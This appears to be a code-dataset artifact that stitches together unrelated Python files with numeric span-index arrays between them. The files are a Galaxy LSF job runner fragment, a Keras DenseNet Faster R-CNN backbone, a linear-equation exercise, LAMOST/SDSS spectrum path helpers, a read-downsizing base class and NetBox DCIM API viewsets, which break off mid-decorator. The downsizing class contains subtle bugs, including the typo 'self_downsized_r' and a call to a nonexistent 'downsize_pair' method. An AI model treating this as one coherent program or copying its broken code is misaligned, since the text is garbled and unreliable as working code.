log.warning("Job id '%s' not found LSF status check" % job_id)
return job_states.OK
return self._get_job_state(status)
def get_failure_reason(self, job_id):
return "bjobs -l " + job_id
def parse_failure_reason(self, reason, job_id):
# LSF will produce the following in the job output file:
# TERM_MEMLIMIT: job killed after reaching LSF memory usage limit.
# Exited with exit code 143.
for line in reason.splitlines():
if "TERM_MEMLIMIT" in line:
from galaxy.jobs import JobState
return JobState.runner_states.MEMORY_LIMIT_REACHED
return None
def _get_job_state(self, state):
# based on:
# https://www.ibm.com/support/knowledgecenter/en/SSETD4_9.1.3/lsf_admin/job_state_lsf.html
# https://www.ibm.com/support/knowledgecenter/en/SSETD4_9.1.2/lsf_command_ref/bjobs.1.html
try:
return {
'EXIT': job_states.ERROR,
'RUN': job_states.RUNNING,
'PEND': job_states.QUEUED,
'DONE': job_states.OK,
'PSUSP': job_states.ERROR,
'USUSP': job_states.ERROR,
'SSUSP': job_states.ERROR,
'UNKWN': job_states.ERROR,
'WAIT': job_states.QUEUED,
'ZOMBI': job_states.ERROR
}.get(state)
except KeyError:
raise KeyError("Failed to map LSF status code [%s] to job state." % state)
__all__ = ('LSF',)
| [
[
[
141,
150
],
[
456,
465
]
],
[
[
186,
189
],
[
207,
210
]
],
[
[
194,
204
],
[
3387,
3397
],
[
4284,
4294
],
[
4325,
4335
],
[
4369,
4379
],
[
4412,
4422
],
[
4452,
4462
],
[
4495,
4505
],
[
4538,
4548
],
[
4581,
4591
],
[
4623,
4633
],
[
4667,
4677
]
],
[
[
325,
329
],
[
347,
351
]
],
[
[
334,
344
],
[
3387,
3397
],
[
4284,
4294
],
[
4325,
4335
],
[
4369,
4379
],
[
4412,
4422
],
[
4452,
4462
],
[
4495,
4505
],
[
4538,
4548
],
[
4581,
4591
],
[
4623,
4633
],
[
4667,
4677
]
],
[
[
437,
448
],
[
676,
687
]
],
[
[
450,
453
],
[
1464,
1467
],
[
3305,
3308
]
],
[
[
477,
483
],
[
1374,
1380
]
],
[
[
672,
675
]
],
[
[
4823,
4830
]
]
] |
"""DenseNet models for Keras.
# Reference paper
- [Densely Connected Convolutional Networks]
(https://arxiv.org/abs/1608.06993) (CVPR 2017 Best Paper Award)
# Reference implementation
- [Torch DenseNets]
(https://github.com/liuzhuang13/DenseNet/blob/master/models/densenet.lua)
- [TensorNets]
(https://github.com/taehoonlee/tensornets/blob/master/tensornets/densenets.py)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from keras import backend as K
from keras.layers import Input, Add, Dense, Activation, Flatten, Convolution2D, MaxPooling2D, ZeroPadding2D, \
AveragePooling2D, TimeDistributed, BatchNormalization, Dropout
from keras import layers
from keras_frcnn.RoiPoolingConv import RoiPoolingConv
"""
couple of functions for frcnn..
"""
def get_weight_path():
return os.path.join("pretrain", 'densenet121_weights_tf_dim_ordering_tf_kernels_notop.h5')
def get_img_output_length(width, height):
def get_output_length(input_length):
# zero_pad
input_length += 6
# apply 4 strided convolutions
filter_sizes = [7, 3, 1, 1]
stride = 2
for filter_size in filter_sizes:
input_length = (input_length - filter_size + stride) // stride
return input_length
return get_output_length(width), get_output_length(height)
BASE_WEIGTHS_PATH = (
'https://github.com/keras-team/keras-applications/'
'releases/download/densenet/')
DENSENET121_WEIGHT_PATH = (
BASE_WEIGTHS_PATH +
'densenet121_weights_tf_dim_ordering_tf_kernels.h5')
DENSENET121_WEIGHT_PATH_NO_TOP = (
BASE_WEIGTHS_PATH +
'densenet121_weights_tf_dim_ordering_tf_kernels_notop.h5')
DENSENET169_WEIGHT_PATH = (
BASE_WEIGTHS_PATH +
'densenet169_weights_tf_dim_ordering_tf_kernels.h5')
DENSENET169_WEIGHT_PATH_NO_TOP = (
BASE_WEIGTHS_PATH +
'densenet169_weights_tf_dim_ordering_tf_kernels_notop.h5')
DENSENET201_WEIGHT_PATH = (
BASE_WEIGTHS_PATH +
'densenet201_weights_tf_dim_ordering_tf_kernels.h5')
DENSENET201_WEIGHT_PATH_NO_TOP = (
BASE_WEIGTHS_PATH +
'densenet201_weights_tf_dim_ordering_tf_kernels_notop.h5')
def dense_block(x, blocks, name):
"""A dense block.
# Arguments
x: input tensor.
blocks: integer, the number of building blocks.
name: string, block label.
# Returns
output tensor for the block.
"""
for i in range(blocks):
x = conv_block(x, 32, name=name + '_block' + str(i + 1))
return x
def transition_block(x, reduction, name):
"""A transition block.
# Arguments
x: input tensor.
reduction: float, compression rate at transition layers.
name: string, block label.
# Returns
output tensor for the block.
"""
bn_axis = 3 if K.image_data_format() == 'channels_last' else 1
x = layers.BatchNormalization(axis=bn_axis, epsilon=1.001e-5,
name=name + '_bn')(x)
x = layers.Activation('relu', name=name + '_relu')(x)
x = layers.Conv2D(int(K.int_shape(x)[bn_axis] * reduction), 1,
use_bias=False,
name=name + '_conv')(x)
x = layers.AveragePooling2D(2, strides=2, name=name + '_pool', padding='same')(x)
return x
def conv_block(x, growth_rate, name):
"""A building block for a dense block.
# Arguments
x: input tensor.
growth_rate: float, growth rate at dense layers.
name: string, block label.
# Returns
Output tensor for the block.
"""
bn_axis = 3 if K.image_data_format() == 'channels_last' else 1
x1 = layers.BatchNormalization(axis=bn_axis,
epsilon=1.001e-5,
name=name + '_0_bn')(x)
x1 = layers.Activation('relu', name=name + '_0_relu')(x1)
x1 = layers.Conv2D(4 * growth_rate, 1,
use_bias=False,
name=name + '_1_conv')(x1)
x1 = layers.BatchNormalization(axis=bn_axis, epsilon=1.001e-5,
name=name + '_1_bn')(x1)
x1 = layers.Activation('relu', name=name + '_1_relu')(x1)
x1 = layers.Conv2D(growth_rate, 3,
padding='same',
use_bias=False,
name=name + '_2_conv')(x1)
x = layers.Concatenate(axis=bn_axis, name=name + '_concat')([x, x1])
return x
def nn_base(input_tensor=None,
blocks=[6, 12, 24, 16],
include_top=False,
weights='imagenet',
input_shape=None,
pooling=None,
classes=1000,
**kwargs):
"""Instantiates the DenseNet architecture.
Optionally loads weights pre-trained on ImageNet.
Note that the data format convention used by the model is
the one specified in your Keras config at `~/.keras/keras.json`.
# Arguments
blocks: numbers of building blocks for the four dense layers.
include_top: whether to include the fully-connected
layer at the top of the network.
weights: one of `None` (random initialization),
'imagenet' (pre-training on ImageNet),
or the path to the weights file to be loaded.
input_tensor: optional Keras tensor
(i.e. output of `layers.Input()`)
to use as image input for the model.
input_shape: optional shape tuple, only to be specified
if `include_top` is False (otherwise the input shape
has to be `(224, 224, 3)` (with `'channels_last'` data format)
or `(3, 224, 224)` (with `'channels_first'` data format).
It should have exactly 3 inputs channels,
and width and height should be no smaller than 32.
E.g. `(200, 200, 3)` would be one valid value.
pooling: optional pooling mode for feature extraction
when `include_top` is `False`.
- `None` means that the output of the model will be
the 4D tensor output of the
last convolutional block.
- `avg` means that global average pooling
will be applied to the output of the
last convolutional block, and thus
the output of the model will be a 2D tensor.
- `max` means that global max pooling will
be applied.
classes: optional number of classes to classify images
into, only to be specified if `include_top` is True, and
if no `weights` argument is specified.
# Returns
A Keras model instance.
# Raises
ValueError: in case of invalid argument for `weights`,
or invalid input shape.
"""
if not (weights in {'imagenet', None} or os.path.exists(weights)):
raise ValueError('The `weights` argument should be either '
'`None` (random initialization), `imagenet` '
'(pre-training on ImageNet), '
'or the path to the weights file to be loaded.')
if weights == 'imagenet' and include_top and classes != 1000:
raise ValueError('If using `weights` as `"imagenet"` with `include_top`'
' as true, `classes` should be 1000')
# Determine proper input shape
if K.image_dim_ordering() == 'th':
input_shape = (3, None, None)
else:
input_shape = (None, None, 3)
if input_tensor is None:
img_input = Input(shape=input_shape)
else:
if not K.is_keras_tensor(input_tensor):
img_input = Input(tensor=input_tensor, shape=input_shape)
else:
img_input = input_tensor
if K.image_dim_ordering() == 'tf':
bn_axis = 3
else:
bn_axis = 1
x = ZeroPadding2D((3, 3))(img_input)
x = layers.Conv2D(64, 7, strides=2, use_bias=False, name='conv1/conv')(x)
x = layers.BatchNormalization(
axis=bn_axis, epsilon=1.001e-5, name='conv1/bn')(x)
x = layers.Activation('relu', name='conv1/relu')(x)
# x = layers.ZeroPadding2D(padding=((1, 1), (1, 1)))(x)
x = layers.MaxPooling2D(3, strides=2, name='pool1')(x)
x = dense_block(x, blocks[0], name='conv2')
x = transition_block(x, 0.5, name='pool2')
x = dense_block(x, blocks[1], name='conv3')
x = transition_block(x, 0.5, name='pool3')
x = dense_block(x, blocks[2], name='conv4')
# here, the output size is similar to resnet50. stop here.
# x = transition_block(x, 0.5, name='pool4')
# x = dense_block(x, blocks[3], name='conv5')
x = layers.BatchNormalization(
axis=bn_axis, epsilon=1.001e-5, name='bn')(x)
x = layers.Activation('relu', name='relu')(x)
return x
def rpn(base_layers,num_anchors):
x = Convolution2D(512, (3, 3), padding='same', activation='relu', kernel_initializer='normal', name='rpn_conv1')(base_layers)
x_class = Convolution2D(num_anchors, (1, 1), padding="same", activation='sigmoid', kernel_initializer='uniform', name='rpn_out_class')(x)
x_regr = Convolution2D(num_anchors * 4, (1, 1), activation='linear', kernel_initializer='zero', name='rpn_out_regress')(x)
return [x_class, x_regr, base_layers]
def classifier(base_layers, input_rois, num_rois, nb_classes = 21, trainable=False):
# compile times on theano tend to be very high, so we use smaller ROI pooling regions to workaround
if K.backend() == 'tensorflow':
pooling_regions = 14
input_shape = (num_rois,14,14,1024) # densenet output channels are 1024..
elif K.backend() == 'theano':
pooling_regions = 7
input_shape = (num_rois,4096,7,7)
# from vgg version..
out_roi_pool = RoiPoolingConv(pooling_regions, num_rois)([base_layers, input_rois])
out_roi_pool = TimeDistributed(AveragePooling2D((7, 7)), name='avg_pool')(out_roi_pool)
out = TimeDistributed(Flatten(name='flatten'))(out_roi_pool)
out = TimeDistributed(Dense(4096, activation='relu', name='fc1'))(out)
out = TimeDistributed(Dropout(0.5))(out)
out = TimeDistributed(Dense(4096, activation='relu', name='fc2'))(out)
out = TimeDistributed(Dropout(0.5))(out)
out_class = TimeDistributed(Dense(nb_classes, activation='softmax', kernel_initializer='zero'), name='dense_class_{}'.format(nb_classes))(out)
# note: no regression target for bg class
out_regr = TimeDistributed(Dense(4 * (nb_classes-1), activation='linear', kernel_initializer='zero'), name='dense_regress_{}'.format(nb_classes))(out)
return [out_class, out_regr]
| [
[
[
415,
430
]
],
[
[
455,
463
]
],
[
[
488,
502
]
],
[
[
513,
515
],
[
890,
892
],
[
6998,
7000
]
],
[
[
535,
547
],
[
2917,
2918
],
[
3175,
3176
],
[
3709,
3710
],
[
7558,
7559
],
[
7784,
7785
],
[
7951,
7952
],
[
9702,
9703
],
[
9854,
9855
]
],
[
[
574,
579
],
[
7732,
7737
],
[
7842,
7847
]
],
[
[
581,
584
]
],
[
[
586,
591
],
[
10260,
10265
],
[
10382,
10387
],
[
10512,
10517
],
[
10706,
10711
]
],
[
[
593,
603
]
],
[
[
605,
612
],
[
10194,
10201
]
],
[
[
614,
627
],
[
9057,
9070
],
[
9196,
9209
],
[
9338,
9351
]
],
[
[
629,
641
]
],
[
[
643,
656
],
[
8047,
8060
]
],
[
[
665,
681
],
[
10110,
10126
]
],
[
[
683,
698
],
[
10094,
10109
],
[
10178,
10193
],
[
10244,
10259
],
[
10320,
10335
],
[
10366,
10381
],
[
10442,
10457
],
[
10496,
10511
],
[
10690,
10705
]
],
[
[
700,
718
]
],
[
[
720,
727
],
[
10336,
10343
],
[
10458,
10465
]
],
[
[
747,
753
],
[
2974,
2980
],
[
3098,
3104
],
[
3157,
3163
],
[
3311,
3317
],
[
3767,
3773
],
[
3931,
3937
],
[
3994,
4000
],
[
4129,
4135
],
[
4258,
4264
],
[
4321,
4327
],
[
4491,
4497
],
[
8089,
8095
],
[
8168,
8174
],
[
8265,
8271
],
[
8382,
8388
],
[
8856,
8862
],
[
8947,
8953
]
],
[
[
794,
808
],
[
9999,
10013
]
],
[
[
859,
874
]
],
[
[
981,
1002
]
],
[
[
1420,
1437
],
[
1569,
1586
],
[
1688,
1705
],
[
1806,
1823
],
[
1925,
1942
],
[
2043,
2060
],
[
2162,
2179
]
],
[
[
1536,
1559
]
],
[
[
1648,
1678
]
],
[
[
1773,
1796
]
],
[
[
1885,
1915
]
],
[
[
2010,
2033
]
],
[
[
2122,
2152
]
],
[
[
2255,
2266
],
[
8444,
8455
],
[
8541,
8552
],
[
8638,
8649
]
],
[
[
2624,
2640
],
[
8493,
8509
],
[
8590,
8606
]
],
[
[
3412,
3422
],
[
2548,
2558
]
],
[
[
4577,
4584
]
],
[
[
9016,
9019
]
],
[
[
9504,
9514
]
]
] |
'''
Система линейных уравнений - 2
'''
a = float(input())
b = float(input())
c = float(input())
d = float(input())
e = float(input())
f = float(input())
if a == 0 and b == 0 and c == 0 and d == 0 and e == 0 and f == 0:
print(5)
elif a * d == b * c and a * f != c * e:
print(0)
elif a == 0 and b == 0 and e != 0:
print(0)
elif c == 0 and d == 0 and f != 0:
print(0)
elif a == 0 and c == 0 and b * f != d * e:
print(0)
elif b == 0 and d == 0 and a * f != c * e:
print(0)
elif a * d == b * c and a * f == c * e:
if b == 0 and d == 0:
if a != 0 and c != 0:
print(3, e / a)
elif a == 0:
if e == 0:
print(3, f / c)
elif c == 0:
if f == 0:
print(3, e / a)
elif a == 0 and c == 0:
if b != 0:
print(4, e / b)
elif d != 0:
print(4, f / d)
elif b != 0:
print(1, -a / b, e / b)
elif d != 0:
print(1, -c / d, f / d)
else:
x = (e * d - b * f) / (a * d - b * c)
y = (a * f - e * c) / (a * d - b * c)
print(2, x, y)
| [
[
[
39,
40
],
[
156,
157
],
[
237,
238
],
[
256,
257
],
[
290,
291
],
[
386,
387
],
[
464,
465
],
[
498,
499
],
[
517,
518
],
[
570,
571
],
[
614,
615
],
[
630,
631
],
[
766,
767
],
[
778,
779
],
[
928,
929
],
[
1024,
1025
],
[
1048,
1049
],
[
1066,
1067
]
],
[
[
58,
59
],
[
167,
168
],
[
246,
247
],
[
301,
302
],
[
408,
409
],
[
442,
443
],
[
507,
508
],
[
540,
541
],
[
808,
809
],
[
841,
842
],
[
902,
903
],
[
932,
933
],
[
939,
940
],
[
1014,
1015
],
[
1032,
1033
],
[
1074,
1075
]
],
[
[
77,
78
],
[
178,
179
],
[
250,
251
],
[
265,
266
],
[
338,
339
],
[
397,
398
],
[
473,
474
],
[
511,
512
],
[
526,
527
],
[
581,
582
],
[
690,
691
],
[
706,
707
],
[
789,
790
],
[
977,
978
],
[
1036,
1037
],
[
1060,
1061
],
[
1078,
1079
]
],
[
[
96,
97
],
[
189,
190
],
[
241,
242
],
[
349,
350
],
[
417,
418
],
[
453,
454
],
[
502,
503
],
[
551,
552
],
[
857,
858
],
[
890,
891
],
[
951,
952
],
[
981,
982
],
[
988,
989
],
[
1010,
1011
],
[
1028,
1029
],
[
1070,
1071
]
],
[
[
115,
116
],
[
200,
201
],
[
269,
270
],
[
312,
313
],
[
421,
422
],
[
477,
478
],
[
530,
531
],
[
610,
611
],
[
653,
654
],
[
762,
763
],
[
837,
838
],
[
935,
936
],
[
1006,
1007
],
[
1056,
1057
]
],
[
[
134,
135
],
[
211,
212
],
[
260,
261
],
[
360,
361
],
[
412,
413
],
[
468,
469
],
[
521,
522
],
[
686,
687
],
[
729,
730
],
[
886,
887
],
[
984,
985
],
[
1018,
1019
],
[
1052,
1053
]
],
[
[
1001,
1002
],
[
1094,
1095
]
],
[
[
1043,
1044
],
[
1097,
1098
]
]
] |
# -*- coding: utf-8 -*-
"""
Author
------
Bo Zhang
Email
-----
bozhang@nao.cas.cn
Created on
----------
- Fri Jul 3 13:13:06 2015 read_spectrum
Modifications
-------------
- Fri Nov 20 10:16:59 2015 reformatting code
- Sun Feb 28 14:39:16 2016 migrated to bopy.spec.lamost
- Fri Jul 15 16:08:00 2016 migrate read_spectrum to read_spectrum.py
Aims
----
- generate LAMOST spectra file name/path
"""
# from __future__ import print_function
import os
import numpy as np
# from astropy.io import fits
# from astropy.table import Table, Column
def lamost_filepath(planid, mjd, spid, fiberid, dirpath="", extname=".fits"):
""" generate file path of a LAMOST spectrum
Parameters
----------
planid: string
planid
mjd: 5-digit integer
mjd (use lmjd rather than mjd for DR3 and after!)
spid: 2-digit integer
spid, the number of the spectrogragh
fiberid: 3-digit integer
fiberid
dirpath: string
the root directory for storing spectra.
Returns
--------
filepath: string
the path of root dir of directory (prefix).
if un-specified, return file name.
"""
# pre-processing: strip
if np.isscalar(planid):
planid = planid.strip()
else:
planid = [_.strip() for _ in planid]
if dirpath == "" or dirpath is None:
# return file name
if np.isscalar(mjd):
# if only input one item
return "spec-%05d-%s_sp%02d-%03d%s" \
% (mjd, planid, spid, fiberid, extname)
else:
# if input a list of items
return np.array(["spec-%05d-%s_sp%02d-%03d%s" %
(mjd[i], planid[i], spid[i], fiberid[i], extname)
for i in range(len(mjd))])
else:
# return file path
if not dirpath[-1] == os.path.sep:
dirpath += os.path.sep
if np.isscalar(mjd):
# if only input one item
return "%s%s%sspec-%05d-%s_sp%02d-%03d%s" \
% (dirpath, planid, os.path.sep,
mjd, planid, spid, fiberid, extname)
else:
# if input a list of items
return np.array(["%s%s%sspec-%05d-%s_sp%02d-%03d%s" %
(dirpath, planid[i], os.path.sep, mjd[i],
planid[i], spid[i], fiberid[i], extname)
for i in range(len(mjd))])
def _test_lamost_filepath():
"""test function **lamost_filepath**
"""
print(lamost_filepath("GAC_061N46_V3", 55939, 7, 78))
print(lamost_filepath("GAC_061N46_V3", 55939, 7, 78, "/"))
print(lamost_filepath("GAC_061N46_V3", 55939, 7, 78, "/pool"))
print(lamost_filepath("GAC_061N46_V3", 55939, 7, 78, "/pool/"))
def sdss_filepath(plate, mjd, fiberid, dirpath="", extname=".fits"):
""" generate file path of a LAMOST spectrum
Parameters
----------
plate: string
plate
mjd: 5-digit integer
mjd (use lmjd rather than mjd for DR3 and after!)
fiberid: 4-digit integer
fiberid
dirpath: string
the root directory for storing spectra.
extname: string
in case that users want to synthesize other data format
Returns
--------
filepath: string
the path of root dir of directory (prefix).
if un-specified, return file name.
"""
if dirpath == "" or dirpath is None:
# return file name
if np.isscalar(mjd):
# if only input one item
return "spec-%04d-%05d-%04d%s" % (plate, mjd, fiberid, extname)
else:
# if input a list of items
return np.array(["spec-%04d-%05d-%04d%s" %
(plate[i], mjd[i], fiberid[i], extname)
for i in range(len(mjd))])
else:
# return file path
if not dirpath[-1] == os.path.sep:
dirpath += os.path.sep
if np.isscalar(mjd):
# if only input one item
return "%s%04d%sspec-%04d-%05d-%04d%s" \
% (dirpath, plate, os.path.sep,
plate, mjd, fiberid, extname)
else:
# if input a list of items
return np.array(["%s%04d%sspec-%04d-%05d-%04d%s" %
(dirpath, plate[i], os.path.sep, plate[i],
mjd[i], fiberid[i], extname)
for i in range(len(mjd))])
def _test_sdss_filepath():
print(sdss_filepath(2238, 52059, 1, "/"))
if __name__ == "__main__":
print("")
print("@Cham: start to test the module ...")
print("")
print("@Cham: testing ""lamost_filepath"" ...")
_test_lamost_filepath()
_test_sdss_filepath()
print("@Cham: OK")
| [
[
[
465,
467
],
[
1877,
1879
],
[
1913,
1915
],
[
2087,
2089
],
[
2328,
2330
],
[
3940,
3942
],
[
3976,
3978
],
[
4146,
4148
],
[
4376,
4378
]
],
[
[
475,
486
],
[
1210,
1212
],
[
1398,
1400
],
[
1634,
1636
],
[
1937,
1939
],
[
2231,
2233
],
[
3509,
3511
],
[
3712,
3714
],
[
4000,
4002
],
[
4283,
4285
]
],
[
[
565,
580
],
[
2566,
2581
],
[
2624,
2639
],
[
2687,
2702
],
[
2754,
2769
]
],
[
[
2482,
2503
],
[
4751,
4772
]
],
[
[
2818,
2831
],
[
4553,
4566
]
],
[
[
4520,
4539
],
[
4779,
4798
]
]
] |
class BaseDownsizing:
def __init__(self, raw_file_f, raw_file_r=None):
self.raw_file_f = raw_file_f
self.raw_file_f = raw_file_f
self._downsized_f = None
if raw_file_r:
self.raw_file_r = raw_file_r
self.raw_file_r = raw_file_r
self._downsized_r = None
def downsize_single(self):
"""Overridden in child classes to perform specified downsizing of fragment reads"""
return self.raw_file_f
def downsize_pair_uncompressed(self):
"""Overridden in child classes to perform specified downsizing of paired-ends reads"""
return self.raw_file_f, self.raw_file_r
def downsize_pair_gzip(self):
"""Overridden in child classes to perform specified downsizing of gzip compressed paired-ends reads"""
return self.raw_file_f, self.raw_file_r
@property
def downsized_pair_uncompressed(self):
if getattr(self, "._downsized_f", None) is None:
self._downsized_f, self_downsized_r = self.downsize_pair()
self.raw_file_f = self._downsized_f
self.raw_file_r = self._downsized_r
return self._downsized_f, self._downsized_r
@property
def downsized_pair_gzip(self):
if getattr(self, "._downsized_f", None) is None:
self._downsized_f, self_downsized_r = self.downsize_pair()
self.raw_file_f = self._downsized_f
self.raw_file_r = self._downsized_r
return self._downsized_f, self._downsized_r
@property
def downsized_single(self):
if getattr(self, "._downsized_f", None) is None:
self._downsized_f = self.downsize_single()
self.raw_file_f = self._downsized_f
return self._downsized_f
| [
[
[
6,
20
]
]
] |
from collections import OrderedDict
from django.conf import settings
from django.db.models import Count, F
from django.http import HttpResponseForbidden, HttpResponse
from django.shortcuts import get_object_or_404
from drf_yasg import openapi
from drf_yasg.openapi import Parameter
from drf_yasg.utils import swagger_auto_schema
from rest_framework.decorators import action
from rest_framework.mixins import ListModelMixin
from rest_framework.response import Response
from rest_framework.viewsets import GenericViewSet, ViewSet
from circuits.models import Circuit
from dcim import filters
from dcim.models import (
Cable, ConsolePort, ConsolePortTemplate, ConsoleServerPort, ConsoleServerPortTemplate, Device, DeviceBay,
DeviceBayTemplate, DeviceRole, DeviceType, FrontPort, FrontPortTemplate, Interface, InterfaceTemplate,
Manufacturer, InventoryItem, Platform, PowerFeed, PowerOutlet, PowerOutletTemplate, PowerPanel, PowerPort,
PowerPortTemplate, Rack, RackGroup, RackReservation, RackRole, RearPort, RearPortTemplate, Region, Site,
VirtualChassis,
)
from extras.api.serializers import RenderedGraphSerializer
from extras.api.views import CustomFieldModelViewSet
from extras.models import Graph
from ipam.models import Prefix, VLAN
from utilities.api import (
get_serializer_for_model, IsAuthenticatedOrLoginNotRequired, ModelViewSet, ServiceUnavailable,
)
from utilities.utils import get_subquery
from virtualization.models import VirtualMachine
from . import serializers
from .exceptions import MissingFilterException
# Mixins
class CableTraceMixin(object):
@action(detail=True, url_path='trace')
def trace(self, request, pk):
"""
Trace a complete cable path and return each segment as a three-tuple of (termination, cable, termination).
"""
obj = get_object_or_404(self.queryset.model, pk=pk)
# Initialize the path array
path = []
for near_end, cable, far_end in obj.trace()[0]:
# Serialize each object
serializer_a = get_serializer_for_model(near_end, prefix='Nested')
x = serializer_a(near_end, context={'request': request}).data
if cable is not None:
y = serializers.TracedCableSerializer(cable, context={'request': request}).data
else:
y = None
if far_end is not None:
serializer_b = get_serializer_for_model(far_end, prefix='Nested')
z = serializer_b(far_end, context={'request': request}).data
else:
z = None
path.append((x, y, z))
return Response(path)
#
# Regions
#
class RegionViewSet(ModelViewSet):
queryset = Region.objects.annotate(
site_count=Count('sites')
)
serializer_class = serializers.RegionSerializer
filterset_class = filters.RegionFilterSet
#
# Sites
#
class SiteViewSet(CustomFieldModelViewSet):
queryset = Site.objects.prefetch_related(
'region', 'tenant', 'tags'
).annotate(
device_count=get_subquery(Device, 'site'),
rack_count=get_subquery(Rack, 'site'),
prefix_count=get_subquery(Prefix, 'site'),
vlan_count=get_subquery(VLAN, 'site'),
circuit_count=get_subquery(Circuit, 'terminations__site'),
virtualmachine_count=get_subquery(VirtualMachine, 'cluster__site'),
)
serializer_class = serializers.SiteSerializer
filterset_class = filters.SiteFilterSet
@action(detail=True)
def graphs(self, request, pk):
"""
A convenience method for rendering graphs for a particular site.
"""
site = get_object_or_404(Site, pk=pk)
queryset = Graph.objects.filter(type__model='site')
serializer = RenderedGraphSerializer(queryset, many=True, context={'graphed_object': site})
return Response(serializer.data)
#
# Rack groups
#
class RackGroupViewSet(ModelViewSet):
queryset = RackGroup.objects.prefetch_related('site').annotate(
rack_count=Count('racks')
)
serializer_class = serializers.RackGroupSerializer
filterset_class = filters.RackGroupFilterSet
#
# Rack roles
#
class RackRoleViewSet(ModelViewSet):
queryset = RackRole.objects.annotate(
rack_count=Count('racks')
)
serializer_class = serializers.RackRoleSerializer
filterset_class = filters.RackRoleFilterSet
#
# Racks
#
class RackViewSet(CustomFieldModelViewSet):
queryset = Rack.objects.prefetch_related(
'site', 'group__site', 'role', 'tenant', 'tags'
).annotate(
device_count=get_subquery(Device, 'rack'),
powerfeed_count=get_subquery(PowerFeed, 'rack')
)
serializer_class = serializers.RackSerializer
filterset_class = filters.RackFilterSet
@swagger_auto_schema(
responses={200: serializers.RackUnitSerializer(many=True)},
query_serializer=serializers.RackElevationDetailFilterSerializer
)
@action(detail=True)
def elevation(self, request, pk=None):
"""
Rack elevation representing the list of rack units. Also supports rendering the elevation as an SVG.
"""
rack = get_object_or_404(Rack, pk=pk)
serializer = serializers.RackElevationDetailFilterSerializer(data=request.GET)
if not serializer.is_valid():
return Response(serializer.errors, 400)
data = serializer.validated_data
if data['render'] == 'svg':
# Render and return the elevation as an SVG drawing with the correct content type
drawing = rack.get_elevation_svg(
face=data['face'],
unit_width=data['unit_width'],
unit_height=data['unit_height'],
legend_width=data['legend_width'],
include_images=data['include_images'],
base_url=request.build_absolute_uri('/')
)
return HttpResponse(drawing.tostring(), content_type='image/svg+xml')
else:
# Return a JSON representation of the rack units in the elevation
elevation = rack.get_rack_units(
face=data['face'],
exclude=data['exclude'],
expand_devices=data['expand_devices']
)
# Enable filtering rack units by ID
q = data['q']
if q:
elevation = [u for u in elevation if q in str(u['id']) or q in str(u['name'])]
page = self.paginate_queryset(elevation)
if page is not None:
rack_units = serializers.RackUnitSerializer(page, many=True, context={'request': request})
return self.get_paginated_response(rack_units.data)
#
# Rack reservations
#
class RackReservationViewSet(ModelViewSet):
queryset = RackReservation.objects.prefetch_related('rack', 'user', 'tenant')
serializer_class = serializers.RackReservationSerializer
filterset_class = filters.RackReservationFilterSet
# Assign user from request
def perform_create(self, serializer):
serializer.save(user=self.request.user)
#
# Manufacturers
#
class ManufacturerViewSet(ModelViewSet):
queryset = Manufacturer.objects.annotate(
devicetype_count=get_subquery(DeviceType, 'manufacturer'),
inventoryitem_count=get_subquery(InventoryItem, 'manufacturer'),
platform_count=get_subquery(Platform, 'manufacturer')
)
serializer_class = serializers.ManufacturerSerializer
filterset_class = filters.ManufacturerFilterSet
#
# Device types
#
class DeviceTypeViewSet(CustomFieldModelViewSet):
queryset = DeviceType.objects.prefetch_related('manufacturer').prefetch_related('tags').annotate(
device_count=Count('instances')
)
serializer_class = serializers.DeviceTypeSerializer
filterset_class = filters.DeviceTypeFilterSet
#
# Device type components
#
class ConsolePortTemplateViewSet(ModelViewSet):
queryset = ConsolePortTemplate.objects.prefetch_related('device_type__manufacturer')
serializer_class = serializers.ConsolePortTemplateSerializer
filterset_class = filters.ConsolePortTemplateFilterSet
class ConsoleServerPortTemplateViewSet(ModelViewSet):
queryset = ConsoleServerPortTemplate.objects.prefetch_related('device_type__manufacturer')
serializer_class = serializers.ConsoleServerPortTemplateSerializer
filterset_class = filters.ConsoleServerPortTemplateFilterSet
class PowerPortTemplateViewSet(ModelViewSet):
queryset = PowerPortTemplate.objects.prefetch_related('device_type__manufacturer')
serializer_class = serializers.PowerPortTemplateSerializer
filterset_class = filters.PowerPortTemplateFilterSet
class PowerOutletTemplateViewSet(ModelViewSet):
queryset = PowerOutletTemplate.objects.prefetch_related('device_type__manufacturer')
serializer_class = serializers.PowerOutletTemplateSerializer
filterset_class = filters.PowerOutletTemplateFilterSet
class InterfaceTemplateViewSet(ModelViewSet):
queryset = InterfaceTemplate.objects.prefetch_related('device_type__manufacturer')
serializer_class = serializers.InterfaceTemplateSerializer
filterset_class = filters.InterfaceTemplateFilterSet
class FrontPortTemplateViewSet(ModelViewSet):
queryset = FrontPortTemplate.objects.prefetch_related('device_type__manufacturer')
serializer_class = serializers.FrontPortTemplateSerializer
filterset_class = filters.FrontPortTemplateFilterSet
class RearPortTemplateViewSet(ModelViewSet):
queryset = RearPortTemplate.objects.prefetch_related('device_type__manufacturer')
serializer_class = serializers.RearPortTemplateSerializer
filterset_class = filters.RearPortTemplateFilterSet
class DeviceBayTemplateViewSet(ModelViewSet):
queryset = DeviceBayTemplate.objects.prefetch_related('device_type__manufacturer')
serializer_class = serializers.DeviceBayTemplateSerializer
filterset_class = filters.DeviceBayTemplateFilterSet
#
# Device roles
#
class DeviceRoleViewSet(ModelViewSet):
queryset = DeviceRole.objects.annotate(
device_count=get_subquery(Device, 'device_role'),
virtualmachine_count=get_subquery(VirtualMachine, 'role')
)
serializer_class = serializers.DeviceRoleSerializer
filterset_class = filters.DeviceRoleFilterSet
#
# Platforms
#
class PlatformViewSet(ModelViewSet):
queryset = Platform.objects.annotate(
device_count=get_subquery(Device, 'platform'),
virtualmachine_count=get_subquery(VirtualMachine, 'platform')
)
serializer_class = serializers.PlatformSerializer
filterset_class = filters.PlatformFilterSet
#
# Devices
#
class DeviceViewSet(CustomFieldModelViewSet):
queryset = Device.objects.prefetch_related(
'device_type__manufacturer', 'device_role', 'tenant', 'platform', 'site', 'rack', 'parent_bay',
'virtual_chassis__master', 'primary_ip4__nat_outside', 'primary_ip6__nat_outside', 'tags',
)
filterset_class = filters.DeviceFilterSet
def get_serializer_class(self):
"""
Select the specific serializer based on the request context.
If the `brief` query param equates to True, return the NestedDeviceSerializer
If the `exclude` query param includes `config_context` as a value, return the DeviceSerializer
Else, return the DeviceWithConfigContextSerializer
"""
request = self.get_serializer_context()['request']
if request.query_params.get('brief', False):
return serializers.NestedDeviceSerializer
elif 'config_context' in request.query_params.get('exclude', []):
return serializers.DeviceSerializer
return serializers.DeviceWithConfigContextSerializer
@action(detail=True)
